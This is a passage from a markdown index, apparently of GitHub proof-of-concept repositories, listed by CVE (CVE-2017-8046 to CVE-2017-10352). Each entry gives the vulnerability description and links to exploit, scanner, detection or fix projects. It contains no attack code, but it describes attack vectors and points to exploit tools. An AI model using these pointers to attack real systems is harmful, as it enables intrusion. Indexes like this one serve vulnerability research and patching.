[jkutner/spring-break-cve-2017-8046](https://github.com/jkutner/spring-break-cve-2017-8046) +- [bkhablenko/CVE-2017-8046](https://github.com/bkhablenko/CVE-2017-8046) +- [cved-sources/cve-2017-8046](https://github.com/cved-sources/cve-2017-8046) +- [jsotiro/VulnerableSpringDataRest](https://github.com/jsotiro/VulnerableSpringDataRest) +- [guanjivip/CVE-2017-8046](https://github.com/guanjivip/CVE-2017-8046) + +### CVE-2017-8225 (2017-04-25) + +On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI. + + +- [kienquoc102/CVE-2017-8225](https://github.com/kienquoc102/CVE-2017-8225) +- [K3ysTr0K3R/CVE-2017-8225-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-8225-EXPLOIT) + +### CVE-2017-8295 (2017-05-04) + +WordPress through 4.7.4 relies on the Host HTTP header for a password-reset e-mail message, which makes it easier for remote attackers to reset arbitrary passwords by making a crafted wp-login.php?action=lostpassword request and then arranging for this message to bounce or be resent, leading to transmission of the reset key to a mailbox on an attacker-controlled SMTP server. This is related to problematic use of the SERVER_NAME variable in wp-includes/pluggable.php in conjunction with the PHP mail function. Exploitation is not achievable in all cases because it requires at least one of the following: (1) the attacker can prevent the victim from receiving any e-mail messages for an extended period of time (such as 5 days), (2) the victim's e-mail system sends an autoresponse containing the original message, or (3) the victim manually composes a reply containing the original message. + + +- [homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset](https://github.com/homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset) +- [alash3al/wp-allowed-hosts](https://github.com/alash3al/wp-allowed-hosts) +- [cyberheartmi9/CVE-2017-8295](https://github.com/cyberheartmi9/CVE-2017-8295) + +### CVE-2017-8367 (2017-04-30) + +Buffer overflow in Ether Software Easy MOV Converter 1.4.24, Easy DVD Creator, Easy MPEG/AVI/DIVX/WMV/RM to DVD, Easy Avi/Divx/Xvid to DVD Burner, Easy MPEG to DVD Burner, Easy WMV/ASF/ASX to DVD Burner, Easy RM RMVB to DVD Burner, Easy CD DVD Copy, MP3/AVI/MPEG/WMV/RM to Audio CD Burner, MP3/WAV/OGG/WMA/AC3 to CD Burner, MP3 WAV to CD Burner, My Video Converter, Easy AVI DivX Converter, Easy Video to iPod Converter, Easy Video to PSP Converter, Easy Video to 3GP Converter, Easy Video to MP4 Converter, and Easy Video to iPod/MP4/PSP/3GP Converter allows local attackers to cause a denial of service (SEH overwrite) or possibly have unspecified other impact via a long username. + + +- [rnnsz/CVE-2017-8367](https://github.com/rnnsz/CVE-2017-8367) + +### CVE-2017-8382 (2017-05-16) + +admidio 3.2.8 has CSRF in adm_program/modules/members/members_function.php with an impact of deleting arbitrary user accounts. + + +- [faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc](https://github.com/faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc) + +### CVE-2017-8464 (2017-06-15) + +Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka "LNK Remote Code Execution Vulnerability." + + +- [Elm0D/CVE-2017-8464](https://github.com/Elm0D/CVE-2017-8464) +- [3gstudent/CVE-2017-8464-EXP](https://github.com/3gstudent/CVE-2017-8464-EXP) +- [doudouhala/CVE-2017-8464-exp-generator](https://github.com/doudouhala/CVE-2017-8464-exp-generator) +- [X-Vector/usbhijacking](https://github.com/X-Vector/usbhijacking) +- [xssfile/CVE-2017-8464-EXP](https://github.com/xssfile/CVE-2017-8464-EXP) +- [TrG-1999/DetectPacket-CVE-2017-8464](https://github.com/TrG-1999/DetectPacket-CVE-2017-8464) +- [tuankiethkt020/Phat-hien-CVE-2017-8464](https://github.com/tuankiethkt020/Phat-hien-CVE-2017-8464) +- [TieuLong21Prosper/Detect-CVE-2017-8464](https://github.com/TieuLong21Prosper/Detect-CVE-2017-8464) + +### CVE-2017-8465 (2017-06-15) + +Microsoft Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allow an attacker to run processes in an elevated context when the Windows kernel improperly handles objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This CVE ID is unique from CVE-2017-8468. + + +- [nghiadt1098/CVE-2017-8465](https://github.com/nghiadt1098/CVE-2017-8465) + +### CVE-2017-8529 (2017-06-15) + +Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, and Windows Server 2012 and R2 allow an attacker to detect specific files on the user's computer when affected Microsoft scripting engines do not properly handle objects in memory, aka "Microsoft Browser Information Disclosure Vulnerability". + + +- [sfitpro/cve-2017-8529](https://github.com/sfitpro/cve-2017-8529) +- [kaddirov/windows2016fixCVE-2017-8529](https://github.com/kaddirov/windows2016fixCVE-2017-8529) + +### CVE-2017-8543 (2017-06-15) + +Microsoft Windows XP SP3, Windows XP x64 XP2, Windows Server 2003 SP2, Windows Vista, Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allow an attacker to take control of the affected system when Windows Search fails to handle objects in memory, aka "Windows Search Remote Code Execution Vulnerability". + + +- [americanhanko/windows-security-cve-2017-8543](https://github.com/americanhanko/windows-security-cve-2017-8543) + +### CVE-2017-8570 (2017-07-11) + +Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243. + + +- [temesgeny/ppsx-file-generator](https://github.com/temesgeny/ppsx-file-generator) +- [rxwx/CVE-2017-8570](https://github.com/rxwx/CVE-2017-8570) +- [MaxSecurity/Office-CVE-2017-8570](https://github.com/MaxSecurity/Office-CVE-2017-8570) +- [SwordSheath/CVE-2017-8570](https://github.com/SwordSheath/CVE-2017-8570) +- [Drac0nids/CVE-2017-8570](https://github.com/Drac0nids/CVE-2017-8570) +- [sasqwatch/CVE-2017-8570](https://github.com/sasqwatch/CVE-2017-8570) +- [erfze/CVE-2017-8570](https://github.com/erfze/CVE-2017-8570) + +### CVE-2017-8625 (2017-08-08) + +Internet Explorer in Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to bypass Device Guard User Mode Code Integrity (UMCI) policies due to Internet Explorer failing to validate UMCI policies, aka "Internet Explorer Security Feature Bypass Vulnerability". + + +- [homjxi0e/CVE-2017-8625_Bypass_UMCI](https://github.com/homjxi0e/CVE-2017-8625_Bypass_UMCI) + +### CVE-2017-8641 (2017-08-08) + +Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674. + + +- [homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject](https://github.com/homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject) + +### CVE-2017-8759 (2017-09-13) + +Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka ".NET Framework Remote Code Execution Vulnerability." + + +- [Voulnet/CVE-2017-8759-Exploit-sample](https://github.com/Voulnet/CVE-2017-8759-Exploit-sample) +- [nccgroup/CVE-2017-8759](https://github.com/nccgroup/CVE-2017-8759) +- [vysecurity/CVE-2017-8759](https://github.com/vysecurity/CVE-2017-8759) +- [BasuCert/CVE-2017-8759](https://github.com/BasuCert/CVE-2017-8759) +- [tahisaad6/CVE-2017-8759-Exploit-sample2](https://github.com/tahisaad6/CVE-2017-8759-Exploit-sample2) +- [homjxi0e/CVE-2017-8759_-SOAP_WSDL](https://github.com/homjxi0e/CVE-2017-8759_-SOAP_WSDL) +- [bhdresh/CVE-2017-8759](https://github.com/bhdresh/CVE-2017-8759) +- [JonasUliana/CVE-2017-8759](https://github.com/JonasUliana/CVE-2017-8759) +- [sythass/CVE-2017-8759](https://github.com/sythass/CVE-2017-8759) +- [ashr/CVE-2017-8759-exploits](https://github.com/ashr/CVE-2017-8759-exploits) +- [l0n3rs/CVE-2017-8759](https://github.com/l0n3rs/CVE-2017-8759) +- [ChaitanyaHaritash/CVE-2017-8759](https://github.com/ChaitanyaHaritash/CVE-2017-8759) +- [smashinu/CVE-2017-8759Expoit](https://github.com/smashinu/CVE-2017-8759Expoit) +- [adeljck/CVE-2017-8759](https://github.com/adeljck/CVE-2017-8759) +- [zhengkook/CVE-2017-8759](https://github.com/zhengkook/CVE-2017-8759) +- [varunsaru/SNP](https://github.com/varunsaru/SNP) +- [GayashanM/OHTS](https://github.com/GayashanM/OHTS) + +### CVE-2017-8760 (2017-05-05) + +An issue was discovered on Accellion FTA devices before FTA_9_12_180. There is XSS in courier/1000@/index.html with the auth_params parameter. The device tries to use internal WAF filters to stop specific XSS Vulnerabilities. However, these can be bypassed by using some modifications to the payloads, e.g., URL encoding. + + +- [Voraka/cve-2017-8760](https://github.com/Voraka/cve-2017-8760) + +### CVE-2017-8779 (2017-05-04) + +rpcbind through 0.2.4, LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3 do not consider the maximum RPC data size during memory allocation for XDR strings, which allows remote attackers to cause a denial of service (memory consumption with no subsequent free) via a crafted UDP packet to port 111, aka rpcbomb. + + +- [drbothen/GO-RPCBOMB](https://github.com/drbothen/GO-RPCBOMB) + +### CVE-2017-8802 (2018-01-16) + +Cross-site scripting (XSS) vulnerability in Zimbra Collaboration Suite (aka ZCS) before 8.8.0 Beta2 might allow remote attackers to inject arbitrary web script or HTML via vectors related to the "Show Snippet" functionality. + + +- [ozzi-/Zimbra-CVE-2017-8802-Hotifx](https://github.com/ozzi-/Zimbra-CVE-2017-8802-Hotifx) + +### CVE-2017-8809 (2017-11-15) + +api.php in MediaWiki before 1.27.4, 1.28.x before 1.28.3, and 1.29.x before 1.29.2 has a Reflected File Download vulnerability. + + +- [motikan2010/CVE-2017-8809_MediaWiki_RFD](https://github.com/motikan2010/CVE-2017-8809_MediaWiki_RFD) + +### CVE-2017-8890 (2017-05-10) + +The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel through 4.10.15 allows attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call. + + +- [beraphin/CVE-2017-8890](https://github.com/beraphin/CVE-2017-8890) +- [thinkycx/CVE-2017-8890](https://github.com/thinkycx/CVE-2017-8890) +- [7043mcgeep/cve-2017-8890-msf](https://github.com/7043mcgeep/cve-2017-8890-msf) + +### CVE-2017-8917 (2017-05-17) + +SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors. + + +- [brianwrf/Joomla3.7-SQLi-CVE-2017-8917](https://github.com/brianwrf/Joomla3.7-SQLi-CVE-2017-8917) +- [stefanlucas/Exploit-Joomla](https://github.com/stefanlucas/Exploit-Joomla) +- [cved-sources/cve-2017-8917](https://github.com/cved-sources/cve-2017-8917) +- [gmohlamo/CVE-2017-8917](https://github.com/gmohlamo/CVE-2017-8917) +- [AkuCyberSec/CVE-2017-8917-Joomla-370-SQL-Injection](https://github.com/AkuCyberSec/CVE-2017-8917-Joomla-370-SQL-Injection) +- [Siopy/CVE-2017-8917](https://github.com/Siopy/CVE-2017-8917) +- [ionutbaltariu/joomla_CVE-2017-8917](https://github.com/ionutbaltariu/joomla_CVE-2017-8917) +- [BaptisteContreras/CVE-2017-8917-Joomla](https://github.com/BaptisteContreras/CVE-2017-8917-Joomla) +- [gloliveira1701/Joomblah](https://github.com/gloliveira1701/Joomblah) + +### CVE-2017-9096 (2017-11-08) + +The XML parsers in iText before 5.5.12 and 7.x before 7.0.3 do not disable external entities, which might allow remote attackers to conduct XML external entity (XXE) attacks via a crafted PDF. + + +- [jakabakos/CVE-2017-9096-iText-XXE](https://github.com/jakabakos/CVE-2017-9096-iText-XXE) + +### CVE-2017-9097 (2017-06-16) + +In Anti-Web through 3.8.7, as used on NetBiter FGW200 devices through 3.21.2, WS100 devices through 3.30.5, EC150 devices through 1.40.0, WS200 devices through 3.30.4, EC250 devices through 1.40.0, and other products, an LFI vulnerability allows a remote attacker to read or modify files through a path traversal technique, as demonstrated by reading the password file, or using the template parameter to cgi-bin/write.cgi to write to an arbitrary file. + + +- [MDudek-ICS/AntiWeb_testing-Suite](https://github.com/MDudek-ICS/AntiWeb_testing-Suite) + +### CVE-2017-9101 (2017-05-21) + +import.php (aka the Phonebook import feature) in PlaySMS 1.4 allows remote code execution via vectors involving the User-Agent HTTP header and PHP code in the name of a file. + + +- [jasperla/CVE-2017-9101](https://github.com/jasperla/CVE-2017-9101) + +### CVE-2017-9248 (2017-07-03) + +Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise. + + +- [bao7uo/dp_crypto](https://github.com/bao7uo/dp_crypto) +- [capt-meelo/Telewreck](https://github.com/capt-meelo/Telewreck) +- [ictnamanh/CVE-2017-9248](https://github.com/ictnamanh/CVE-2017-9248) +- [oldboysonnt/dp](https://github.com/oldboysonnt/dp) +- [blacklanternsecurity/dp_cryptomg](https://github.com/blacklanternsecurity/dp_cryptomg) +- [cehamod/UI_CVE-2017-9248](https://github.com/cehamod/UI_CVE-2017-9248) +- [hlong12042/CVE-2017-9248](https://github.com/hlong12042/CVE-2017-9248) + +### CVE-2017-9417 (2017-06-03) + +Broadcom BCM43xx Wi-Fi chips allow remote attackers to execute arbitrary code via unspecified vectors, aka the "Broadpwn" issue. + + +- [mailinneberg/Broadpwn](https://github.com/mailinneberg/Broadpwn) + +### CVE-2017-9430 (2017-06-05) + +Stack-based buffer overflow in dnstracer through 1.9 allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a command line with a long name argument that is mishandled in a strcpy call for argv[0]. An example threat model is a web application that launches dnstracer with an untrusted name string. + + +- [homjxi0e/CVE-2017-9430](https://github.com/homjxi0e/CVE-2017-9430) +- [j0lama/Dnstracer-1.9-Fix](https://github.com/j0lama/Dnstracer-1.9-Fix) + +### CVE-2017-9476 (2017-07-31) + +The Comcast firmware on Cisco DPC3939 (firmware version dpc3939-P20-18-v303r20421733-160420a-CMCST); Cisco DPC3939 (firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST); and Arris TG1682G (eMTA&DOCSIS version 10.0.132.SIP.PC20.CT, software version TG1682_2.2p7s2_PROD_sey) devices makes it easy for remote attackers to determine the hidden SSID and passphrase for a Home Security Wi-Fi network. + + +- [wiire-a/CVE-2017-9476](https://github.com/wiire-a/CVE-2017-9476) + +### CVE-2017-9506 (2017-08-23) + +The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). + + +- [random-robbie/Jira-Scan](https://github.com/random-robbie/Jira-Scan) +- [pwn1sher/jira-ssrf](https://github.com/pwn1sher/jira-ssrf) +- [labsbots/CVE-2017-9506](https://github.com/labsbots/CVE-2017-9506) + +### CVE-2017-9544 (2017-06-12) + +There is a remote stack-based buffer overflow (SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1. By sending an overly long username string to registresult.htm for registering the user, an attacker may be able to execute arbitrary code. + + +- [adenkiewicz/CVE-2017-9544](https://github.com/adenkiewicz/CVE-2017-9544) + +### CVE-2017-9554 (2017-07-24) + +An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors. + + +- [rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-](https://github.com/rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-) +- [Ez0-yf/CVE-2017-9554-Exploit-Tool](https://github.com/Ez0-yf/CVE-2017-9554-Exploit-Tool) + +### CVE-2017-9606 (2017-06-15) + +Infotecs ViPNet Client and Coordinator before 4.3.2-42442 allow local users to gain privileges by placing a Trojan horse ViPNet update file in the update folder. The attack succeeds because of incorrect folder permissions in conjunction with a lack of integrity and authenticity checks. + + +- [Houl777/CVE-2017-9606](https://github.com/Houl777/CVE-2017-9606) + +### CVE-2017-9608 (2017-12-27) + +The dnxhd decoder in FFmpeg before 3.2.6, and 3.3.x before 3.3.3 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted mov file. + + +- [LaCinquette/practice-22-23](https://github.com/LaCinquette/practice-22-23) + +### CVE-2017-9609 (2017-07-17) + +Cross-site scripting (XSS) vulnerability in Blackcat CMS 1.2 allows remote authenticated users to inject arbitrary web script or HTML via the map_language parameter to backend/pages/lang_settings.php. + + +- [faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc](https://github.com/faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc) + +### CVE-2017-9627 (2017-07-07) + +An Uncontrolled Resource Consumption issue was discovered in Schneider Electric Wonderware ArchestrA Logger, versions 2017.426.2307.1 and prior. The uncontrolled resource consumption vulnerability could allow an attacker to exhaust the memory resources of the machine, causing a denial of service. + + +- [USSCltd/aaLogger](https://github.com/USSCltd/aaLogger) + +### CVE-2017-9757 (2017-06-19) + +IPFire 2.19 has a Remote Command Injection vulnerability in ids.cgi via the OINKCODE parameter, which is mishandled by a shell. This can be exploited directly by authenticated users, or through CSRF. + + +- [peterleiva/CVE-2017-9757](https://github.com/peterleiva/CVE-2017-9757) + +### CVE-2017-9769 (2017-08-02) + +A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process. + + +- [kkent030315/CVE-2017-9769](https://github.com/kkent030315/CVE-2017-9769) + +### CVE-2017-9779 (2017-09-07) + +OCaml compiler allows attackers to have unspecified impact via unknown vectors, a similar issue to CVE-2017-9772 "but with much less impact." + + +- [homjxi0e/CVE-2017-9779](https://github.com/homjxi0e/CVE-2017-9779) + +### CVE-2017-9791 (2017-07-10) + +The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage. + + +- [IanSmith123/s2-048](https://github.com/IanSmith123/s2-048) +- [dragoneeg/Struts2-048](https://github.com/dragoneeg/Struts2-048) +- [xfer0/CVE-2017-9791](https://github.com/xfer0/CVE-2017-9791) + +### CVE-2017-9798 (2017-09-18) + +Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c. + + +- [nitrado/CVE-2017-9798](https://github.com/nitrado/CVE-2017-9798) +- [pabloec20/optionsbleed](https://github.com/pabloec20/optionsbleed) +- [l0n3rs/CVE-2017-9798](https://github.com/l0n3rs/CVE-2017-9798) +- [brokensound77/OptionsBleed-POC-Scanner](https://github.com/brokensound77/OptionsBleed-POC-Scanner) + +### CVE-2017-9805 (2017-09-15) + +The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. + + +- [luc10/struts-rce-cve-2017-9805](https://github.com/luc10/struts-rce-cve-2017-9805) +- [hahwul/struts2-rce-cve-2017-9805-ruby](https://github.com/hahwul/struts2-rce-cve-2017-9805-ruby) +- [mazen160/struts-pwn_CVE-2017-9805](https://github.com/mazen160/struts-pwn_CVE-2017-9805) +- [Lone-Ranger/apache-struts-pwn_CVE-2017-9805](https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805) +- [0x00-0x00/-CVE-2017-9805](https://github.com/0x00-0x00/-CVE-2017-9805) +- [BeyondCy/S2-052](https://github.com/BeyondCy/S2-052) +- [chrisjd20/cve-2017-9805.py](https://github.com/chrisjd20/cve-2017-9805.py) +- [UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-](https://github.com/UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-) +- [UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit](https://github.com/UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit) +- [AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378](https://github.com/AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378) +- [wifido/CVE-2017-9805-Exploit](https://github.com/wifido/CVE-2017-9805-Exploit) +- [rvermeulen/apache-struts-cve-2017-9805](https://github.com/rvermeulen/apache-struts-cve-2017-9805) +- [jongmartinez/-CVE-2017-9805-](https://github.com/jongmartinez/-CVE-2017-9805-) +- [z3bd/CVE-2017-9805](https://github.com/z3bd/CVE-2017-9805) +- [0xd3vil/CVE-2017-9805-Exploit](https://github.com/0xd3vil/CVE-2017-9805-Exploit) +- [Shakun8/CVE-2017-9805](https://github.com/Shakun8/CVE-2017-9805) + +### CVE-2017-9822 (2017-07-20) + +DNN (aka DotNetNuke) before 9.1.1 has Remote Code Execution via a cookie, aka "2017-08 (Critical) Possible remote code execution on DNN sites." + + +- [murataydemir/CVE-2017-9822](https://github.com/murataydemir/CVE-2017-9822) + +### CVE-2017-9830 (2017-06-27) + +Remote Code Execution is possible in Code42 CrashPlan 5.4.x via the org.apache.commons.ssl.rmi.DateRMI Java class, because (upon instantiation) it creates an RMI server that listens on a TCP port and deserializes objects sent by TCP clients. + + +- [securifera/CVE-2017-9830](https://github.com/securifera/CVE-2017-9830) + +### CVE-2017-9833 (2017-06-24) + +/cgi-bin/wapopen in Boa 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges. NOTE: multiple third parties report that this is a system-integrator issue (e.g., a vulnerability on one type of camera) because Boa does not include any wapopen program or any code to read a FILECAMERA variable. + + +- [anldori/CVE-2017-9833](https://github.com/anldori/CVE-2017-9833) + +### CVE-2017-9841 (2017-06-27) + +Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI. + + +- [mbrasile/CVE-2017-9841](https://github.com/mbrasile/CVE-2017-9841) +- [RandomRobbieBF/phpunit-brute](https://github.com/RandomRobbieBF/phpunit-brute) +- [cyberharsh/Php-unit-CVE-2017-9841](https://github.com/cyberharsh/Php-unit-CVE-2017-9841) +- [ludy-dev/PHPUnit_eval-stdin_RCE](https://github.com/ludy-dev/PHPUnit_eval-stdin_RCE) +- [incogbyte/laravel-phpunit-rce-masscaner](https://github.com/incogbyte/laravel-phpunit-rce-masscaner) +- [akr3ch/CVE-2017-9841](https://github.com/akr3ch/CVE-2017-9841) +- [p1ckzi/CVE-2017-9841](https://github.com/p1ckzi/CVE-2017-9841) +- [jax7sec/CVE-2017-9841](https://github.com/jax7sec/CVE-2017-9841) +- [mileticluka1/eval-stdin](https://github.com/mileticluka1/eval-stdin) +- [dream434/CVE-2017-9841-](https://github.com/dream434/CVE-2017-9841-) +- [MadExploits/PHPunit-Exploit](https://github.com/MadExploits/PHPunit-Exploit) +- [MrG3P5/CVE-2017-9841](https://github.com/MrG3P5/CVE-2017-9841) +- [Chocapikk/CVE-2017-9841](https://github.com/Chocapikk/CVE-2017-9841) + +### CVE-2017-9934 (2017-07-17) + +Missing CSRF token checks and improper input validation in Joomla! CMS 1.7.3 through 3.7.2 lead to an XSS vulnerability. + + +- [xyringe/CVE-2017-9934](https://github.com/xyringe/CVE-2017-9934) + +### CVE-2017-9947 (2017-10-23) + +A vulnerability has been identified in Siemens APOGEE PXC and TALON TC BACnet Automation Controllers in all versions <V3.5. A directory traversal vulnerability could allow a remote attacker with network access to the integrated web server (80/tcp and 443/tcp) to obtain information on the structure of the file system of the affected devices. + + +- [RoseSecurity/APOLOGEE](https://github.com/RoseSecurity/APOLOGEE) + +### CVE-2017-9999 +- [homjxi0e/CVE-2017-9999_bypassing_General_Firefox](https://github.com/homjxi0e/CVE-2017-9999_bypassing_General_Firefox) + +### CVE-2017-10235 (2017-08-08) + +Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). The supported version that is affected is Prior to 5.1.24. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 6.7 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H). + + +- [fundacion-sadosky/vbox_cve_2017_10235](https://github.com/fundacion-sadosky/vbox_cve_2017_10235) + +### CVE-2017-10271 (2017-10-19) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). + + +- [1337g/CVE-2017-10271](https://github.com/1337g/CVE-2017-10271) +- [s3xy/CVE-2017-10271](https://github.com/s3xy/CVE-2017-10271) +- [ZH3FENG/PoCs-Weblogic_2017_10271](https://github.com/ZH3FENG/PoCs-Weblogic_2017_10271) +- [c0mmand3rOpSec/CVE-2017-10271](https://github.com/c0mmand3rOpSec/CVE-2017-10271) +- [Luffin/CVE-2017-10271](https://github.com/Luffin/CVE-2017-10271) +- [cjjduck/weblogic_wls_wsat_rce](https://github.com/cjjduck/weblogic_wls_wsat_rce) +- [kkirsche/CVE-2017-10271](https://github.com/kkirsche/CVE-2017-10271) +- [pssss/CVE-2017-10271](https://github.com/pssss/CVE-2017-10271) +- [SuperHacker-liuan/cve-2017-10271-poc](https://github.com/SuperHacker-liuan/cve-2017-10271-poc) +- [peterpeter228/Oracle-WebLogic-CVE-2017-10271](https://github.com/peterpeter228/Oracle-WebLogic-CVE-2017-10271) +- [Cymmetria/weblogic_honeypot](https://github.com/Cymmetria/weblogic_honeypot) +- [JackyTsuuuy/weblogic_wls_rce_poc-exp](https://github.com/JackyTsuuuy/weblogic_wls_rce_poc-exp) +- [lonehand/Oracle-WebLogic-CVE-2017-10271-master](https://github.com/lonehand/Oracle-WebLogic-CVE-2017-10271-master) +- [shack2/javaserializetools](https://github.com/shack2/javaserializetools) +- [ETOCheney/JavaDeserialization](https://github.com/ETOCheney/JavaDeserialization) +- [r4b3rt/CVE-2017-10271](https://github.com/r4b3rt/CVE-2017-10271) +- [cved-sources/cve-2017-10271](https://github.com/cved-sources/cve-2017-10271) +- [XHSecurity/Oracle-WebLogic-CVE-2017-10271](https://github.com/XHSecurity/Oracle-WebLogic-CVE-2017-10271) +- [kbsec/Weblogic_Wsat_RCE](https://github.com/kbsec/Weblogic_Wsat_RCE) +- [SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961](https://github.com/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961) +- [Yuusuke4/WebLogic_CNVD_C_2019_48814](https://github.com/Yuusuke4/WebLogic_CNVD_C_2019_48814) +- [7kbstorm/WebLogic_CNVD_C2019_48814](https://github.com/7kbstorm/WebLogic_CNVD_C2019_48814) +- [ianxtianxt/-CVE-2017-10271-](https://github.com/ianxtianxt/-CVE-2017-10271-) +- [testwc/CVE-2017-10271](https://github.com/testwc/CVE-2017-10271) +- [Al1ex/CVE-2017-10271](https://github.com/Al1ex/CVE-2017-10271) +- [pizza-power/weblogic-CVE-2019-2729-POC](https://github.com/pizza-power/weblogic-CVE-2019-2729-POC) +- [KKsdall/7kbstormq](https://github.com/KKsdall/7kbstormq) + +### CVE-2017-10352 (2017-10-19) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: 